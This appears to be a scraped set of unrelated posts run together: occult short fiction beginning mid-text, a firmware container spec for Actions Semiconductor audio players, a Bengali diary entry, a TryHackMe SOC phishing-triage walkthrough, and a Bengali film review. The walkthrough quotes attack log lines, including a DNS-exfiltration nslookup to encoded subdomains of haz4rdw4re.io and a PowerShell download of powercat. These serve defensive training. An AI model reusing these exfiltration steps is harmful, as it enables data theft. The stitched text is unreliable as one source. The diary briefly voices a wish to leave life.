This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.

This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.

There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.

And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.

Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?

Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?

I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to not reflect ourselves multiple time a day.

To scry is to peer sideways into the mirror realm and find insight. It is too look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.

If such power can be had by simply looking how much greater would it be to walk within?

As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.

However, if someone were step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.

And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.

How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?

Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.

It is up to you whether or not you wish to believe them.

Addendum 4: The In Between

The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.

In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.

At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.

Why would this place be considered a sibling to The Mirror Realm?

The most common way to enter The In Between is to step inside a wall.

Addendum 5: The Fae

They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?

I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.

Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.

---

#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.

But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.

We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.

And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet'hotep and its lesser-known siblings NAM, NUM, and IM.

But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can't even truly look at them because, to us, those angles, do not exist.

We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.

Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.

So who did I meet that unusually warm Saturday night?

I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.

Not my front door, nor my back door.

It came from my basement door.

If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.

I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.

I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.

I can't recall seeing his eyes.

“Excellent!” he said in a thick British accent stolen from Austin Powers.

“This is one where you listen.”

“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.

“A bit?” He rubbed his chin with his right hand. “I don't think so.”

He offered his left hand.

“Archibald Horatio Pierse, IV,” he said, overly emphasizing The Fourth as if it was of great importance. “Pierse with an 's',” concluded his introduction.

He was still shaking my hand, which I didn't remember offering in return.

“Sometimes,” he said. “I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.”

'bloke or bird,' I thought. This has to be a bit.

“Right,” he said, no longer shaking my left hand, but still holding it.

The world fractured, splintered. Every cell pulled in a different direction.

Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.

We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.

We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.

There is no pattern, no spider's web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.

When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.

Gender, race, nationality, species, moral character, upbringing: I am every possibility.

I am every drop in the ocean and the ocean itself.

I am the sky, the moon, the stars, a worm, a bacteria, a lichen.

The one who showed me—I had forgotten he existed—he bade me, “turn around.”

What a strange request! I am all that is and was. Do I not already “see” in every direction?

“Turn around.”

A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.

Syzygy.

I am All, yet All That is Not Me is also All.

I see the tapestry, the enmeshed pattern.

The beauty.

The belonging.

The Love.

Every part of me weeps.

An infinity of infinities.

Each unique.

Together, whole.

Like curtains dancing in the breeze.

Like a rainstorm.

Like staring at the sun.

Like the song of cicadas.

Unity.

From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…

All is One and One is All.

Then I'm lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.

And I can't stop crying.

---

I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don't I show you what sideways looks like?
How about sideways?
What about sideways"?
I'd like to show your sideways.

I thinkdon't I willshall I showstretchsideways youwhatsideways looks like.

---

#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal

Regardless of what's your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.

Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.

Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.

Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.

In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.

And to the vendors who ship these devices — you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.

And to start us up, here's the format of FWIMAGE.FW for ATJ212X devices.

Actions Semiconductor FWIMAGE.FW Specification

1. File Structure

The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).

Section	Size	Description
Global Header	512 bytes	Basic metadata (Magic, VID/PID, Ver)
LDIR Table	240 * 32 bytes	Fixed-size Logical Directory entries for all files
Component Data	Variable	Raw binary data for drivers, APs, and STY files

2. Global Header (Sector 0)

The first 512 bytes contain the system metadata.

Offset	Size	Description
0x00	4	Magic: 0x0FF0AA55
0x04	4	SDK Version (ASCII)
0x08	4	Firmware Version (ASCII)
0x0C	2	Vendor ID (VID)
0x0E	2	Product ID (PID)
0x10	4	LDIR Checksum (Stride 4)
0x50	48	USB Setup Info (ASCII)
0x80	336	SDK Description (ASCII)
0x1FA	4	R3 Config Sector Offset (Pointer to DEVINFO.BIN)
0x1FE	2	Global Header Checksum (Sum of first 510 bytes)

3. Logical Directory (LDIR) Table

Starting at offset 0x200 (Sector 1) and ending at 0x2000 (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.

Offset	Size	Description
0x00	8	Filename (8.3 format, space padded)
0x08	3	Extension (ASCII)
0x0B	5	Padding
0x10	4	Sector Offset: Start position in sectors (absolute position = offset * 512)
0x14	4	File Size: Size in bytes
0x18	4	Reserved
0x1C	4	File Checksum (Stride 4 sums)

4. Checksums

Global Header Checksum

The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.

uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i < len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] << 8);
        sum += val;
    }
    return sum;
}

LDIR & File Checksum Algorithm (Stride 4)

Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.

#include <stdint.h>
#include <stddef.h>

/**
 * Calculates the Actions Stride-4 checksum.
 * @param data Pointer to the buffer (must be 4-byte aligned for some platforms)
 * @param len  Length of data in bytes (should be multiple of 4)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] << 8) |
                       ((uint32_t)data[i+2] << 16) |
                       ((uint32_t)data[i+3] << 24);
        sum += val;
    }
    return sum;
}

Sector Alignment

Every file within the image must start on a 512-byte boundary. When packing, files must be padded with null bytes to reach the next sector.

Boot Sequence

The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.

---

Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered — see rockbox sources for atjboottool.

মৌসুমী ভৌমিকের গানটা আজ হঠাৎ মনে পড়ে গেল- “কেন শুধু শুধু ছুটে চলা, একে একে কথা বলা, নিজের জন্য বাঁচা নিজেকে নিয়ে..”। গানটা কেমন যেন আজকের দিনগুলোর মুখপাত্র হয়ে উঠেছে। শব্দগুলো শুধু সুর নয়, এখন আমার নিঃশ্বাসের অনুষঙ্গ।

দিনগুলি এখন হিসাবের বাইরে, বিচ্ছিন্ন পাথরের মতো যার যার মত ছড়িয়ে পড়ে আছে। গতকালের সকাল আর আজকের বিকালের মধ্যে কোনো সীমানা খুঁজে পাই না। দুই দিনকে আলাদা করার জন্য নতুন কোনো শব্দ নেই অভিধানে। প্রতিদিন একই জানালা, একই আলোছায়া, একই ঘড়ির কাঁটার দৌড়। বিরক্তির ভাঁজ কপালে জমে, কিন্তু পরক্ষণেই মনে হয়- এইটুকুই বা কম কী? সময় তো আরো ভাঙচুর করতে পারত, তবু কিছুটা শৃঙ্খলা এখনো টিকে আছে।

গত কয়েকদিন ধরে শরীর বিদ্রোহ করে চলেছে। একদিন তো জ্বর এসে সময়ের হিসাবই লোপাট করে দিল। চোখ মেললাম- সকাল, আবার মেললাম- দুপুর, আরেকবার- দেখলাম সন্ধ্যা ইতোমধ্যে বিদায় জানাচ্ছে। জ্বর যদিও সেরে গেছে, কিন্তু ছেড়ে গেছে গলা-ব্যথা আর তার নিষ্ঠুর সঙ্গী মাথা-ব্যথাকে। সঙ্গে সঙ্গ দেয়ার জন্যে রয়ে গেছে মৃদু কাশি- অতি পরিচিত শত্রু। কাশির স্মৃতি আমার জন্য সাবান পানিতে ভেজা চামড়ার মতো, পুরোনো এক অসুখের ছায়া মনে ভর করে। কখনো কখনো শরীর মনে করিয়ে দেয়, স্মৃতি শুধু মনের নয়, দেহের কোষেও লেখা থাকে।

আগে যা ভালো লাগত, এখন তা ধূসর মনে হয়। বইপত্র, গান, মুভি -সব যেন পানিতে ভেজা ধূসর কাগজের মতো নিষ্প্রাণ। সবচেয়ে বিস্ময়কর ব্যাপার হলো- শিশুদের দেখলে আগে যে হৃদয় গলে যেত, এখন সেখানে কোনো না কোনো জায়গায় একটি বিরক্তি দাঁড়িয়ে থাকে। মনে হয়, ওদের কোলাহল থেকে দূরে থাকি, নিঃশব্দে থাকি। এই পরিবর্তনটাই বেশি ভয়ংকর -আগে যা জীবনকে স্পর্শ করত, আজ তা থেকে নিজেকে গুটিয়ে নেওয়ার প্রবণতায় পরিণত হয়েছে।

ছুটি! শব্দটা এখন প্রার্থনার সমার্থক। কিন্তু, এ ছুটি কেবল দৈনন্দিন রুটিন থেকে নয়, এ ছুটি এই অভ্যন্তরীণ নীরবতা থেকে, এই আবেগহীন প্রবাহ থেকে। কখনো কখনো জীবন থেকেই ছুটি নেওয়ার ইচ্ছে জাগে, একটা দীর্ঘ, শান্ত নিদ্রার মতো। কিন্তু জীবনের প্রতি এক গভীর অনুক্ত মায়া, এখনো রয়ে গেছে। যেমন- একটা পুরোনো বাড়ি, যার দরজা-জানালা ভাঙছে, কিন্তু যার প্রতিটি ধূলিকণায় স্মৃতি লেগে আছে। তাই মায়াটাও এখনো রয়ে গেছে।

জীবন কালের এই বয়সে দাঁড়িয়ে উপলব্ধি হয় যে, জীবন একইসাথে ‘বোঝা’ ও ‘বরাদ্দ’। অনেকটা পাহাড়ের মাঝপথে উঠে পেছনে ফিরে তাকানোর মতো। নিচের পথটুকু পেরিয়েছি, কিন্তু শীর্ষ ছোঁয়া এখনও বহুদূর। আর শরীরে জমা হয়েছে ক্লান্তি। তবুও এগোতে হচ্ছে, কারণ নিচে নামার পথটা অসম্ভব দুর্গম।

আজকের এই এলোমেলো ভাবনা গুলো ডায়েরির পাতায় লিখে রাখলাম; হয়তো এই শূন্যতা পূর্ণতারই আরেক রূপ। সময় হয়তো হৃদয়কে শূন্য করে তুলছে পরবর্তী কোনো গভীর অনুভবের জন্য জায়গা তৈরি করতে। জ্বর সেরে যাওয়ার পর শরীর যেমন একটু বেশি সংবেদনশীল হয়, তেমনই হয়তো এই আত্মিক স্তব্ধতার পর কিছু দেখা বা বোঝার সূক্ষ্ম ক্ষমতা ফিরে আসবে।

আজ শুধু এই কথাগুলোই লিখে রাখি, যেন এই মুহূর্তের ভার্চুয়াল সাক্ষী থাকে এই শব্দগুলো। হয়তো কোনো এক ভবিষ্যৎ দিনে ফিরে দেখব, এই শব্দগুলো পড়ব, আর তখন বোঝার চেষ্টা করব- যে ব্যক্তি এগুলো লিখেছিল, সে আসলে হারিয়ে যাচ্ছিল নাকি নতুন কোনো উপকূলের খোঁজ পেয়েছিল।

জানালার বাইরে এখন রাত। দূরে কোনো বাড়ির জানালায় একটি বাতি জ্বলে আছে, এক টুকরো মানবিক উষ্ণতা। হয়তো জীবন আসলে এটাই- একটা অন্ধকারে জ্বলা বাতি খোঁজা, যে বাতি হয়তো অন্যের বারান্দায়, কিন্তু তার আলো আমাদের জানালাতেও পড়ে। আজকের মতো এটুকুই যথেষ্ট। আজ শুধু থাকব, আর শ্বাস নেব। এই অস্থির হৃদয় নিয়েই, এই অসুস্থ শরীর নিয়েই, এই স্তব্ধ সময় ধরেই।

⠀⠀

⠀⠀

হয়তো, নিজেকে নিয়ে বেঁচে থাকার অর্থই হলো- এই ভাঙাচোরা মুহূর্তগুলোকেও আস্তে আস্তে, একটু একটু করে, স্পর্শ করে যাওয়া…

⠀⠀

⠀⠀

⠀⠀

This is a guide to get a 100% True Positive rate for the Phishing Unfolding SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.

Introduction and Considerations

The description of the room is the following:

Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.

Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?

In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains 36 alerts that start appearing after a short period of time. Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not. The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis. Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of “Unassigned” alerts. Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.

Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the True Positive alerts, and only the first on the chain of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!). The room also offers a “Documentation” tab, containing a “Company Information” tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.

Grading

The SOC Simulator, technically speaking, only cares for alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue. Furthermore, the written reports are “graded” by an LLM. The tool recommends using the following format for reporting: Time of activity: List of Affected Entities: Reason for Classifying as True Positive: Reason for Escalating the Alert: Recommended Remediation Actions: List of Attack Indicators:

However, what the LLM seems to actually be looking for is the 5 Ws of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict. As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.

Alert 1: Suspicious email from external domain (ID 1000) – Low severity

The information the SIEM gives us is (some output omitted):

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

sender:
eileen@trendymillineryco.me

recipient:
support@tryhatme.com

attachment:
None

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

content:
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately

This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as True Positive. The MITRE ATT&CK ID for Phishing is T1566. Let's check the log management tool (in my case, I chose Splunk) and search with the “eileen” email as a recipient, just to see if support actually sent their banking details. The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.

Alert 2: Suspicious email from external domain (ID 1003) – Low severity

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

timestamp
01/26/2026 21:15:30.473

subject:
Grow Your Hat Business Overnight with this Secret Formula

sender:
leonard@fashionindustrytrends.xyz

recipient:
yani.zubair@tryhatme.com

attachment:
None

content:
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in

At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&CK ID T1566) such as offering compensation by entering a page and clicking something. Further actions from Yani Zubair's hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.

Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity

Description:
A suspicious process with an uncommon parent-child relationship was detected in your environment.

timestamp:
01/26/2026 21:45:42.473

host.name:
win-3450

process.name:
nslookup.exe

process.pid:
5520

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io

process.working_directory:
C:\Users\michael.ascot\downloads\exfiltration\

event.action:
Process Create (rule: ProcessCreate)

This alert had a HIGH SEVERITY, and there is no wonder why... what exactly happened? Let's take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called “exfiltration” to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated. Let's see what we can find from the logs. But first, let's check who win-3450 is. From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company. Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let's check events happening at this hostname a few minutes before an after the alert.

Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami. This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded. Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user's privileges and machine (MITRE ATT&CK ID T1033). Now we have confirmed that this is a True Positive, but we still don't know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named “ImportantInvoice-Febrary.zip” was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let's search for it on Splunk.

Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO's email, michael.ascot@tryhatme.com, received a email containing an attachment named ImportantInvoice-Febrary.zip. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Febrary instead of February), which is not uncommon to see on Phishing emails. This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.

With all this information, we can write quite a hefty report. We now know it's a True Positive and that it requires escalation.

Recommended Remediation Actions: host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean – inform on this as well.

Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert – they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that's due to its logic rather than a mistake on our side).

Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity

Description:
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.

timestamp:
01/26/2026 21:43:57.473

host.name:
win-3450

process.name:
net.exe

process.pid:
5784

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords

process.working_directory:
C:\Users\michael.ascot\downloads\

event.action:
Process Create (rule: ProcessCreate)

This normally wouldn't be cause for concern, as the description in the SIEM tells us, but we can see it happened on hostname win-3450, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.

At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this. However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory – the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.

Recommended Remediation Actions: similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.

Alert ID 1024 – Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.

And with this one, the room has finished. Out of 36 alerts, there were 17 True Positives, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of User Awareness Training, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of Log monitoring. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.

কিছু সিনেমা আমরা গল্পের টানে দেখি, কিছু দেখি অভিনেতার জন্য। Rental Family (2025) আমার ক্ষেত্রে দ্বিতীয় দলে পড়লেও, সিনেমা শেষ করে উঠে দাঁড়ানোর সময় বুঝলাম- এটা শুধু একজন অভিনেতার কামব্যাক নয়, বরং মানুষের প্রয়োজন, শূন্যতা আর অনুভূতির এক গভীর পাঠ।

ব্রেন্ডন ফ্রেজার – এই নামটা আমার কাছে মানেই সদ্য কৈশোর পেরিয়ে যুব পথে এগিয়ে যাওয়া বয়সের রোমাঞ্চ। The Mummy, Journey to the Center of the Earth – এই সিনেমাগুলোয় তার উপস্থিতি ছিল প্রাণবন্ত, আত্মবিশ্বাসী, আলোয় ভরা। বহুদিন পর তার চেহারাটি পোস্টারে চোখে পড়তেই যেন পুরোনো স্মৃতি গুলো ঝলমল করে উঠলো, আর সেই টানেই বসে পড়েছিলাম “ভাড়া পরিবার” বা ‘Rental Family’ দেখতে। কিন্তু এবারের ব্রেন্ডন ফ্রেজার ছিলেন একেবারেই ভিন্ন একজন – নীরব, ভাঙা, ক্লান্ত এক মানুষ।

এই সিনেমার Philip চরিত্রটিকে দেখে বারবার মনে হয়েছে, সে যেন ব্রেন্ডন ফ্রেজারের বাস্তব জীবনেরই এক ছায়া। একসময় যিনি অভিনয় জগতে জনপ্রিয়তার শিখরে ছিলেন, আজ তার নামই যেন ভুলে যেতে বসেছে মানুষ। জীবনের দায়ে, টিকে থাকার তাগিদে সে অভিনয় করছে। কিন্তু সেটি কোনো মঞ্চে নয়, বরং মানুষের জীবনের ফাঁকা জায়গাগুলোতে। বাবা নেই এমন শিশুর ভাড়া করা বাবা, পরিবারের সামনে একজন নারীর পরিপূর্ণতা লাভে ভাড়াটে স্বামী – এ যেন অভিনয়েরও আরেক রূপ, যেখানে ক্যামেরা নেই, কিন্তু অনুভূতি আছে।

সিনেমাটি দেখতে দেখতে সবচেয়ে যে ভাবনাটি মনে গভীরভাবে দাগ কেটেছে, তা হলো- মানুষ কত বিচিত্র উপায়ে মানুষের প্রয়োজন পূরণ করে। সমাজের প্রতিটি শূন্যস্থান কেউ না কেউ এসে ভরাট করে দেয়। কেউ পেশার খাতিরে, কেউ বাঁচার তাগিদে, কেউ বা নিঃসঙ্গতা থেকে। Rental Family যেন সেই অদ্ভুত অথচ বাস্তব পৃথিবীর দরজাটা ধীরে খুলে দেয়, যেখানে ভালোবাসা ভাড়া নেওয়া যায়, পরিবার সাময়িক হয়, কিন্তু অনুভূতিগুলো অস্থায়ী হলেও মিথ্যে নয়।

Philip চরিত্রের সবচেয়ে মানবিক মুহূর্তটি আসে তখনই, যখন সে নিজের বহু কাঠখড় পুড়িয়ে পাওয়া একটি ডিটেকটিভ সিনেমার অফার ফিরিয়ে দেয়। এই শহর, এই দেশ ছেড়ে যেতে হবে- এই শর্তের সামনে দাঁড়িয়ে সে মনে করে ছোট্ট মেয়েটির কথা, যার বাবার ভূমিকায় অভিনয় করতে করতে সে নিজেই আবেগে জড়িয়ে পড়েছে।

বাস্তবে কোনো সম্পর্ক নেই, কোনো রক্তের টান নেই – তবু সে মেয়েটিকে কথা দিয়েছিল, সে আর তাকে ছেড়ে যাবে না। এই দৃশ্যটি নিঃশব্দে বলে দেয়- অনুভূতির প্রতিশ্রুতি কখনো কখনো জীবনের লক্ষ্যকেও হার মানায়।

সিনেমার আরেকটি গভীরভাবে নাড়া দেওয়া চরিত্র Kikuo Hasegawa। একসময়ের বিখ্যাত অভিনেতা, আজ স্মৃতিভ্রমে আক্রান্ত এক বৃদ্ধ। তার একটাই ইচ্ছা- শৈশবের বাড়ি, যৌবনের স্মৃতি, পরিবার নিয়ে কাটানো গ্রামের সেই নিবাসকে, সেই দিনগুলো আরেকবার দেখে আসা। কিন্তু বয়স আর রোগের দেয়ালে আটকে যায় সেই আকুতি।

